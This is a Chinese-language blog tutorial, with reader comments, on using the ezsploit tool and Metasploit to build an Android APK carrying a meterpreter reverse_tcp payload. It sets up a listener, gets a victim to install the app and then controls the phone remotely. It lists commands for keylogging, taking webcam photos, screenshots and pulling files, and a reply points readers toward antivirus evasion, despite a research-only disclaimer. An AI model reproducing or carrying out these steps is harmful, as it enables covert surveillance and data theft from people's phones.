【KALI】安全研究,黑客是这么操控安卓手机的—ezsploit

本教程基于安全测试 不能用于违法犯罪  仅供与研究与如何防御

KALI系统自带一种方法可以自己制作APP远程后台(payload),但是操作过于繁琐,不适合新手使用今天给大家带来一个更方便的方法,来替代原版的骚操作
下面开始教程啦~

本教程分为三步,安装工具,生成与控制

.001

首先当然是把工具从gayhub下载下来啦
在终端输入指令

git clone https://github.com/rand0m1ze/ezsploit.git

结果如图:

接着我们进入工具目录
继续输入指令:

cd ezsploit

如图所示:

然后给与这个工具的安装权限
输入指令:

chmod +x ezsploit.sh

 

“chmod +x ezsploit.sh”指的是 给执行权限
linux中不同文件类型会拥有不同的颜色
蓝色表示目录
绿色表示可执行文件
红色表示压缩文件
浅蓝色表示链接文件
灰色表示其它文件

输入完成后,在工具的目录下运行它
输入指令:

./ezsploit.sh

接着就会进入工具页面;

.002

输入启动指令后,会提示按下回车进入
按下回车后来到了主界面,如图

我们需要使用的是payload,所以输入“1”
然后回车,如图

因为我们的目标是安卓手机,所以选择“4”,android
输入完回车后,会提示设置HOST地址
这里指的是设置本机的内网IP
这里我们右键桌面,新建一个终端
在终端里面输入

mfconfig

即可看到自己内网IP地址,接着关闭新建的终端,将IP地址填入ezsploit界面
然后回车,如图

接着会让你输入设置PORT端口,这里推荐越高越好
主要是未被占用的闲置端口,我设置的4444
输入后回车,他就会生成一个被控端APP
如图所示

一个警告##
在这里如果你使用的是kali中文版
它在这个生成APP步骤时会提示“没有那个文件或目录”
这是因为中文的Desktop目录被换成了中文的“桌面”二字
工具未搜索到目录,就会提示生成失败,如图

这时候我们需要新建一个终端
在里面输入

mkdir Desktop

ls过后会发现root根目录下面多了一个Desktop文件夹
如图

接着我们输入

cd Desktop

进入Desktop文件夹,继续输入指令

mkdir temp

ls过后发现temp文件夹已经创建成功,如图

接着就可以关闭这个终端啦,回到我们的ezsploit操作界面
按下回车重新开始生成
选择4(android)并重新输入一遍IP与PORT
回车后即可看到生成成功的提示
如图

这样APP后台就成功啦

接着输入“6”回车来退出这个程序,如图

看见“Good Bye”,也就是已经退出此程序啦

(如果没有报错直接生成成功则跳过此步骤)
clear清理一下输出记录
开始下一步!

.003

clear清理一下输入日志后,我们输入

msfconsole

回车后打开msfconsole操作界面
如图所示

接着我们输入

use multi/handler

来切换到这个模式
再输入

set payload android/meterpreter/reverse_tcp

来进行payload的设置
如图所示

然后我们输入

show options

来查看一下当前HOST(IP地址)与PORT(端口)的设置情况
如图

可以发现HOST一栏是一个空的
PORT则是我们设置的4444
我们输入指令

set LHOST 192.168.1.111

192.168.1.111就是自己内网IP地址
我的是这个所以输入这个
回车后,继续输入一遍

show options

查看一下当前配置,可以看见HOST与PORT已被设置完成
如图

接着最重要的一步啦
输入

exploit

接着会提示已经打开了192.168.1.111:4444的监听状态
如图

我们把APP复制出来,发送给手机,安装并且运行一下
手机点开后APP没有任何反应
而我们后台却显示有设备进入
这时候就可以为所欲...
偶不
就可以搞事情啦~
我输入sysinfo
马上给我回显出了系统信息
是不是很给力呢?
如图

接下来给出一些好玩的指令,至于怎么玩还是靠你们发挥啦~

小提示:输入help或者?可以显示全部指令哦~

Download(upload)  path 下载(上传)指定目录文件
  ps 列出当前系统进程
  Kill uid 消灭指定uid系统进程
  keyscan_start 开始键盘记录软件
  webcam_snap 拍照
screenshot 截屏

Linux中所有代码必须严格区分大小写哦~请不要输入错误

 

好啦~本次教程到此结束,由Nutssss小萌新原创文章
本教程仅供与学习交流,任何通过技术来违法犯罪非法牟利的都将受到法律和人民的制裁!你伤害的是国家和**还有普通老百姓的利益!最后都会被绳之以法!

 

Nutssss原创,转载请标明出处

点赞
  1. lbm说道:
    Firefox Windows 10

    一开始在手机上安装后,好像直接就被杀了后台,kali那边也是显示了第一行之后就不动了,然后我把手机杀毒关了,shell能在后台运行,kali重新exploit依然显示第一行是怎么回事

    1. nutssss nutssss说道:
      Google Chrome Android 9

      因为本身shell是安全测试 在手机上都是秒杀的 需要这方面要求可以学习一下免杀方面,这个教程只是介绍一键生成shell啦

  2. 快乐的沙雕说道:
    Google Chrome Windows 10

    下载完了以后打开以后Kali哪里成功了,但是刚输入SysInfo就说TimeoutError操作超时,每次都要重新打开shell才行。。。。。

    1. nutssss nutssss说道:
      Google Chrome Android 9

      多数手机并不能直接拿下 需要自行获取root最高权限才可以

发表评论

电子邮件地址不会被公开。必填项已用 * 标注